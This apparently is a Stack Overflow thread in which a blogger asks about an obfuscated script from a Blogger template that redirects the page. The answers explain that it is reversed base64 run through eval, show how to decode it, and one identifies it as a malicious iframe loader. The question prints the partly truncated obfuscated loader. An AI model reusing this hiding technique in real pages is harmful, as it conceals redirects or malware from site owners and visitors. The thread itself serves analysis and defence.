What coding language is this inside a javascript?

Question

I have the script below and I don't know were to start searching because I am not familiar with the code.

That code is included on my blog at blogger.com

To be specific, it came from the template I downloaded.

I wanted to modify that code coz it's injecting some text and I am curious how they did it.

What it does is, when I remove the element with the id="someID", they redirecting my page to their website.

Note: I deleted some of the script on the middle part because it is too long and can't handle by this site.

UPDATE: I deleted the middle value of var I1I

here is the complete script http://jsfiddle.net/0xmz6cf6/

<script>//<![CDATA[
var I1I='=oQKpkyJ8dCK0lGbwNnLnQHelRnMywncn1WaBBDfkxWaoNEZuVGcwFGfwIzMyIDfwRHdoJjM8RHanlWZoBjM89GUK1GcxYTTwt0c8hGdkl2dwIDfnBna8BDMyIjM8VGbiFGbpFmdh91YpB3Xv5GfwE0M8RHanlmc8BDM2Ezc85WanJXYtJjM8xGbh12cflXYsB3XyVmdvhmMywHZs9mQhFEM8R3cvBVeyFWbtV3cBBDfr9GfzR3cvBnclRWasNHMyw3ZtlUbvRmbhJ1dvh2cBBDfkFWZoxXZtFmTnFGV5J0c05WZtVGbFRXZnx3drhGUwJlQ0w0bax3YyNHdldGflxWe0NHMywXQDFUQBFUQBFUQBx3bm5Wa8NmczxHc0RHa8Rnbl1WZsVUZ0FWZyNGfmVmc8l0Z28FNwVnb3ZTV8lGchlnclVXcqxXbvNGfMJVV8JXZkFWZoN0M8xWZiFGbjRnMywHNoN0M8R2Q1wnclRmcvJGMywnclJnclZWZyxHbyVHfyVGZhVGa8J3ZtlWRzwnbp9ma8Fzc0N3bwxWZiFGbwIDf0h2ZpJHMywHM1EDMywHdz9GctVnbwIDf5JXYk52bjV2cyIDf1MHdz9GcsVmYhxGMywHdwJXZjhXZ8BzNwIDfy9GbvNmMywnbpdmch1GMywHdmVGb8Rzc0N3bwxWZiFGbwIDf4BXNwIDfuJXd0VmcwIDf4JHdzBjM8hnc0NHOywXMzR3cvBXb15WQwwHbvNGMywHdz9GctVnbBBDfwUDMywHdvB3cn9GbixHdwlmcjN3QzwXZsTY8MGK4I2epMGK3IWPltXKkxSZssGLjxSYsAHK3IGKqJ2Jo0Hcg4mc1RXZy1Xfp01YbtGLpcyZnwyJixFXnsSKjhSZrciYcx1JoAHeFdWZSBydl5GKlNWYsBXZy5Cc9A3ep01YbtGKml2ep0SLjhSZslGa3tTfpkiNzgyZulmc0N1b05yY6kSOysyYoUGZvNkchh2Qt9mcm5yZulmc0N1P1MjPpEWJj1zYogyKpkSKh9yYoQnbJV2cyFGcoUmOncyPhxzYo4mc1RXZytXKjhibvlGdj5Wdm1TZ7lCZsUGLrxyYsEGLwhibvlGdj5WdmhCbhZXZ';
function _0lO(data) {
    var _10OlOI = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var o1, o2, o3, h1, h2, h3, h4, bits, i = 0,
        enc = '';
    do {
        h1 = _10OlOI.indexOf(data.charAt(i++));
        h2 = _10OlOI.indexOf(data.charAt(i++));
        h3 = _10OlOI.indexOf(data.charAt(i++));
        h4 = _10OlOI.indexOf(data.charAt(i++));
        bits = h1 << 18 | h2 << 12 | h3 << 6 | h4;
        o1 = bits >> 16 & 0xff;
        o2 = bits >> 8 & 0xff;
        o3 = bits & 0xff;
        if (h3 == 64) {
            enc += String.fromCharCode(o1)
        } else if (h4 == 64) {
            enc += String.fromCharCode(o1, o2)
        } else {
            enc += String.fromCharCode(o1, o2, o3)
        }
    } while (i < data.length);
    return enc
}
function _10O(string) {
    var ret = '',
        i = 0;
    for (i = string.length - 1; i >= 0; i--) {
        ret += string.charAt(i);
    }
    return ret;
}
eval(_0lO(_10O(I1I)));
//]]>
</script>

Answer 1

It's not a 'coding language' per se: it's just an attempt to obfuscate the code that's executed on the page. And it's (at least) double-encoded actually. )

The first stage is quite easy to unwrap: just replace eval(_0lO(_10O(I1I))) with something like console.log(_0lO(_10O(I1I))) - and you'll have the source in your console. I've prepared a simple demo, but it obviously won't show the whole code (as you removed some part of encoded text).

What you get, however, is not the code to work on yet - it's the result of packer processing of the original source, the second stage I mentioned. Here's the question that discusses the issue in more details. The bottom line is that there's a useful site that'll allow you to unpack the code.

Answer 2

So, I dig a bit deeper and this is what I found:

function _10O(string) {
    var ret = '',
        i = 0;
    for (i = string.length - 1; i >= 0; i--) {
        ret += string.charAt(i);
    }
    return ret;
}

This function does nothing than mirroring a given string. So ABC would be CBA after. It is used to mirror the given var I1I (which is actualy mirrored base64) to base64. Then it is base64-decoded by the _0lO function.

The output of this operation _0lO(_10O(I1I) should be something like:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.from​CharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){............ // I have stripped that here to not include any malicious code inside Stack Overflow!

This is still an obfuscated string, but it will then get executed by the eval in your script.

Have a look at this site about malicious scripts, where I found the actual content of the script by using a google search with parts of the decoded content of your script.

So let's assume: This is a malicious, obfuscated and base64 encoded script used to open up an <iframe> to a malicious site.

Note: Running this on my machine affected in an antivirus popup, so be careful with that. I've stripped the code to not include the whole malicious eval content.

Answer 3

The code you have there is base64-encoded data that has been reversed back-to-front.

In this line:

eval(_0lO(_10O(I1I)));

• First _10O(I1I) reverses I1I so that it's in the right order.
• Then _0lO() decodes that from base64 into data (which in this case is a regular string value containing obfuscated JavaScript).
• Finally, eval() (which is known to be evil, BTW) evaluates the decoded text as JavaScript.

To find out what script is there, simply replace the above line with this:

console.log(_0lO(_10O(I1I)));

As far as modifying it, I'd say just take the decoded code, modify it, and then put it back on your site without the silly encoding that just about anyone can crack.